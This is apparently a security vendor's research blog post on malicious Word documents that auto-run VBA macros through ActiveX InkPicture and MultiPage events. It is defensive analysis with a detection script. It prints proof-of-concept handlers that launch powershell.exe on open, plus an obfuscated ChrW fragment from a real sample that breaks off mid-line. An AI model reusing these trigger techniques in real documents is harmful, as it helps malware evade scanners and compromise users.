
In late August we began to detect malicious Microsoft Word documents containing Visual Basic (VB) macro code that appeared to trigger when the document was opened. However, the documents did not contain any of the standard events used to launch VB macro code when a document is opened, such as the Document_Open or Auto_Open events. Upon closer examination, all the documents contained the ActiveX InkPicture control and the Painted event. The InkPicture Painted event is triggered upon document open, just like the Document_Open event. Using ActiveX controls like InkPicture and the events associated with them, an attacker can create malicious documents that launch VB macro code when the document is opened without using the standard document open event triggers. Security solutions that examine documents and only look for the standard document open events are likely to miss documents that use ActiveX controls like InkPicture to launch code when the document is first opened.

Other vendors made note of the use of InkPicture ActiveX controls to launch VB macro code when the document is opened [1] [2].

It was also immediately obvious that InkPicture events other than Painted, like Painting or MouseHover, could be used to launch VB macro code at document open. In addition, Microsoft Office ActiveX controls other than InkPicture could also be used to launch VB macro code at document open.

We created a number of proof-of-concept documents using other events associated with InkPicture to observe how these samples behaved in the Threat Grid sandbox.

For example, this proof-of-concept sample launches powershell.exe using the InkPicture Painting event when the document opens.

Dim Once As Boolean


Private Sub InkPicture1_painting(ByVal hDC As Long, ByVal Rect As InkRectangle, Allow As Boolean)
If Once Then Exit Sub
Once = True
Shell ("powershell.exe")
End Sub

Figure 1: powershell.exe is launched using the InkPicture Painting event when the document opens

This proof-of-concept sample launches powershell.exe using the InkPicture MouseHover event when the document opens. This event triggers when the mouse is on top of the InkPicture control; it triggers automatically if the mouse starts over the document when it opens, or when the user moves the mouse on top of the document while it is open.

Dim Once As Boolean

Private Sub InkPicture1_MouseHover()
If Once Then Exit Sub
Once = True
Shell ("powershell.exe")
End Sub

Figure 2: powershell.exe is launched using the InkPicture MouseHover event when the document opens

We added detection for these proof-of-concept samples as well as the means to detect new variants using other ActiveX controls.

Other researchers noted that InkPicture events in addition to Painted, and ActiveX controls other than InkPicture could be used to launch VB macros when a document was opened [3].

We have now begun to detect in-the-wild samples using InkPicture events other than Painted. We have also begun to detect in-the-wild samples using ActiveX controls other than InkPicture to launch VB macro code when a document is opened.

For example, we detected a very small number of documents using the MouseEnter event that is triggered at document open if the mouse is over the document.

 

Private Sub InkPicture1_MouseEnter()
   Dim first As String
   Dim second As String
   Dim third As String
   Dim fourth As String
   Dim fifth As String
   Dim sixth As String
   Dim seventh As String
   Dim eighth As String
   Dim ninth As String
   Dim tenth As String
   Dim eleventh As String
   Dim twelfth As String
   Dim last As String
first = ChrW(99) & ChrW(109) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(99)
second = ChrW(32) & ChrW(80) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(83) & ChrW(104) & ChrW(101) & ChrW(108)
third = ChrW(108) & ChrW(32) & ChrW(40) & ChrW(78) & ChrW(101) & ChrW(119) &

Over the weekend of October 15 and 16 we detected a large number of documents using the ActiveX control MultiPage to automatically launch VB macro code at document open. These documents contain the ActiveX MultiPage control and use the associated Layout event. The Microsoft documentation indicates the Layout event triggers when, “… a form, Frame, or Multipage changes size.” [4]

The malicious documents, and proof-of-concept documents we created, demonstrate the MultiPage control’s Layout event will trigger automatically when a document opens.

This is an example of the Layout event from a malicious sample:

Public Sub Adbvy_Layout(ByVal hdpmymr As Long)
   If MdsMR Then Exit Sub
   MdsMR = True
   gHLPhAD
End Sub
Public Sub gHLPhAD()
   On Error GoTo vdvunp
   PAaPbaC
   tcqmPm BXGkJ
   Exit Sub
vdvunp:
End Sub

The ActiveX controls InkPicture and MultiPage are just 2 of many ActiveX controls supported by Microsoft Office. Many of these ActiveX controls have associated events that can be triggered if a document is simply opened and macros are enabled.

Microsoft Office does not enable untrusted macros by default, but based on the fact users can manually enable macros and the sheer volume of malicious documents with embedded VB macros we see, attackers are finding success using these kinds of documents. We expect to see attackers further expand the use of ActiveX controls and further evolve techniques to avoid detection.
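The detection gap described above can be shown with a short scan over extracted VBA source. This is an added example, not Threat Grid's detection logic: it flags Sub names ending in the ActiveX events named in this post alongside the standard open events, and reports whether the handler reaches a Shell call through other Subs in the module. The function names, the event list and the sample module are assumptions constructed for illustration; Function procedures and comment stripping are not handled.

```python
import re

# Auto-run names that open-event-only scanners already check for.
STANDARD = {"document_open", "autoopen", "auto_open", "workbook_open", "autoexec"}
# ActiveX event suffixes named in this article; the control name is arbitrary.
ACTIVEX_EVENTS = {"painted", "painting", "mousehover", "mouseenter", "layout"}
SUB_RE = re.compile(
    r"^[ \t]*(?:(?:Public|Private)[ \t]+)?Sub[ \t]+(\w+)[^\n]*\n(.*?)^[ \t]*End[ \t]+Sub",
    re.I | re.M | re.S)

def classify(name):
    """Return 'standard', 'activex' or None for a lowercased Sub name."""
    if name in STANDARD:
        return "standard"
    control, _, event = name.rpartition("_")
    return "activex" if control and event in ACTIVEX_EVENTS else None

def scan(vba_source):
    """List (handler, kind, reaches_shell) for every auto-triggering Sub."""
    subs = {m.group(1).lower(): m.group(2) for m in SUB_RE.finditer(vba_source)}
    findings = []
    for name in subs:
        kind = classify(name)
        if kind is None:
            continue
        # Walk calls to other Subs in the module, looking for a Shell call.
        seen, stack, shell = {name}, [name], False
        while stack:
            body = subs[stack.pop()]
            shell = shell or re.search(r"\bShell\b", body, re.I) is not None
            for tok in re.findall(r"\w+", body.lower()):
                if tok in subs and tok not in seen:
                    seen.add(tok)
                    stack.append(tok)
        findings.append((name, kind, shell))
    return findings

# Constructed sample modelled on the article's snippets (no Document_Open).
SAMPLE = """Private Sub InkPicture1_Painting(ByVal hDC As Long, ByVal Rect As InkRectangle, Allow As Boolean)
If Once Then Exit Sub
Launch
End Sub
Sub Launch()
Shell ("powershell.exe")
End Sub
Public Sub Adbvy_Layout(ByVal hdpmymr As Long)
gHLPhAD
End Sub
"""
```

Calling scan(SAMPLE) returns two ActiveX findings and no standard ones, which is the case an open-event-only check passes over; handler names are returned lowercased because VBA identifiers are case-insensitive.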

Example malicious document SHAs:



References

[1] https://joe4security.blogspot.com/2016/09/will-it-blend-this-is-question-new.html

[2] https://www.proofpoint.com/us/threat-insight/post/ursnif-banking-trojan-campaign-sandbox-evasion-techniques

[3] https://www.greyhathacker.net/?m=201609

[4] https://msdn.microsoft.com/en-us/library/office/gg264490.aspx

 



Authors

Ross Gibb

Reverse Engineer, AMP Threat Grid

Engineering